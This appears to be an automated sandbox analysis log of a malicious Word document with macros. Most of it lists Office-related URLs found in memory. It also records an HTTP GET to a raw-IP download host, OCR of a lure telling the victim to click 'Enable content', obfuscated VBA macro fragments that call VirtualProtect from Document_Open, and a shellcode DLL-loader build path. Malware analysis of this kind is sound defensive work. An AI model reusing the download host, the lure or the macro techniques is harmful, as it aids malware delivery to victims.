Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdateddll
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://onedrive.live.com
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false-
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/embed?i
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.comrts#
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://osi.office.net
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://osi.office.net$aC
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://osi.office.net6a1
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://osi.office.neta
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://osi.office.netna
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://osi.office.netst
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://otelrules.azureedge.net
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.290115292.000000000DADE000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://outlook.office.com
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com&
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://outlook.office.com/
Source: WINWORD.EXE, 00000000.00000000.299221788.000000000D11D000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.265756794.000000000D11D000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.comR
Source: WINWORD.EXE, 00000000.00000000.290115292.000000000DADE000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://outlook.office365.com
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://outlook.office365.com/
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activitiesr
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonV
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/d0
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/V_
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlookc
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://pages.store.office.com/review/query
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspxS
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: WINWORD.EXE, 00000000.00000000.299221788.000000000D11D000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.265756794.000000000D11D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptionsF
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: WINWORD.EXE, 00000000.00000000.289192987.000000000D1FB000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.266167152.000000000D1FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json00
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonp
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13db8
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://powerlift.acompli.net
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetectU
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectoryTV
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://roaming.edog.
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://settings.outlook.com
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://settings.outlook.comS
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://staging.cortana.ai
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://store.office.cn/addinstemplateFl
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWrite.
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.comN
Source: WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.comP
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.comV
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.comW
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.comp
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: WINWORD.EXE, 00000000.00000000.289192987.000000000D1FB000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.266167152.000000000D1FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFiley
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://tasks.office.com
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://tellmeservice.osi.office.netst
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: WINWORD.EXE, 00000000.00000000.289192987.000000000D1FB000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.266167152.000000000D1FB000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: WINWORD.EXE, 00000000.00000000.299221788.000000000D11D000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.265756794.000000000D11D000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://web.microsoftstream.com/video/#rF
Source: WINWORD.EXE, 00000000.00000000.289192987.000000000D1FB000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.266167152.000000000D1FB000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://webshell.suite.office.com
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://wus2.contentsync.
Source: WINWORD.EXE, 00000000.00000000.299221788.000000000D11D000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.265756794.000000000D11D000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.odwebp.svc.msm
Source: global trafficHTTP traffic detected: GET /fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-f HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.8.146.139Connection: Keep-Alive

System Summary

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4Screenshot OCR: Enable editing" button on W a the top bar, and then click "Enable content". p gb .Lm"^. - . 0
Source: Screenshot number: 4Screenshot OCR: Enable content". p gb .Lm"^. - . 0 PO I ' am Vk b4 r H m % I i '00% O Type here to sear
Document contains an embedded VBA macro with suspicious strings
Source: valliant.document.08.11.2022.docOLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: valliant.document.08.11.2022.docOLE, VBA macro line: Set = CallByName((), tITeCC_iA6p("evEOscajIaM"), VbGet, )
Source: valliant.document.08.11.2022.docOLE, VBA macro line: Set = CallByName((tITeCC_iA6p("ArNmaAhd3cdR")), tITeCC_iA6p("BCdu5uMzXrdf"), VbGet, tITeCC_iA6p("exLSMEco"))
Source: valliant.document.08.11.2022.docOLE, VBA macro line: Set = CallByName((), tITeCC_iA6p("VYLYrWqAG19hy"), VbGet, )
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 4128
Source: valliant.document.08.11.2022.docOLE, VBA macro line: Private Sub Document_Open()
Source: valliant.document.08.11.2022.docOLE indicator, VBA macros: true
Source: valliant.document.08.11.2022.docVirustotal: Detection: 26%
Source: valliant.document.08.11.2022.docReversingLabs: Detection: 18%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 4128
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 4132
Source: valliant.document.08.11.2022.doc.LNK.0.drLNK file: ..\..\..\..\..\Desktop\valliant.document.08.11.2022.doc
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2908
Source: valliant.document.08.11.2022.docOLE indicator, Word Document stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{8011A935-294F-4F63-BF68-112F881F16E0} - OProcSessId.datJump to behavior
Source: classification engineClassification label: mal80.expl.winDOC@3/11@0/2
Source: valliant.document.08.11.2022.docOLE document summary: title field not present or empty
Source: valliant.document.08.11.2022.docOLE document summary: author field not present or empty
Source: valliant.document.08.11.2022.docOLE document summary: edited time not present or 0
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: valliant.document.08.11.2022.docInitial sample: OLE zip file path = docProps/custom.xml
Source: valliant.document.08.11.2022.docStatic file information: File size 2316502 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: Binary string: P:\DocGeneratingSigning\ShellcodeDoc\DllLoaderShellcode\Build\RemoteDllLoader\Release-x32\RemoteDllLoader.pdb source: WINWORD.EXE, 00000000.00000000.286197791.0000000014DE0000.00000040.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.304891180.00000000148D7000.00000040.00000001.00020000.00000000.sdmp
